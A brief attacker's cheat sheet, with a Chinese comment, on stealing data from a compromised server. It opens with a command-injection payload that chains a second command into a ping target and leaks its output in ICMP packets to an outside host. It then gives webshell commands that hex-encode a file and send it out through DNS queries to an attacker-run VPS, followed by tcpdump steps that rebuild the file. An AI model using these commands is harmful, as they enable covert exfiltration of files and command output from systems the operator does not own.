localhost ; pwd | xxd -p | while read line; do ping 192.168.27.1 -p $line -c 1 ; done

https://www.aldeid.com/wiki/File-transfer-via-DNS

on webshell:

xxd -p  test.jpg  out.hex

for a in `cat out.hex` ; do dig   @8.8.8.8   a.example.com ; done

(8.8.8.8为vps的ip地址，详件dig指定dns查询)

on  vps:  

tcpdump  -s0   udp port 53  -w dns.txt

tcpdump -n -r  dns.txt | grep example.com | cut -d ' ' -f9 | cut -d '.'  -f1 | uniq > out.txt

xxd -r -p out.txt  ok.jpg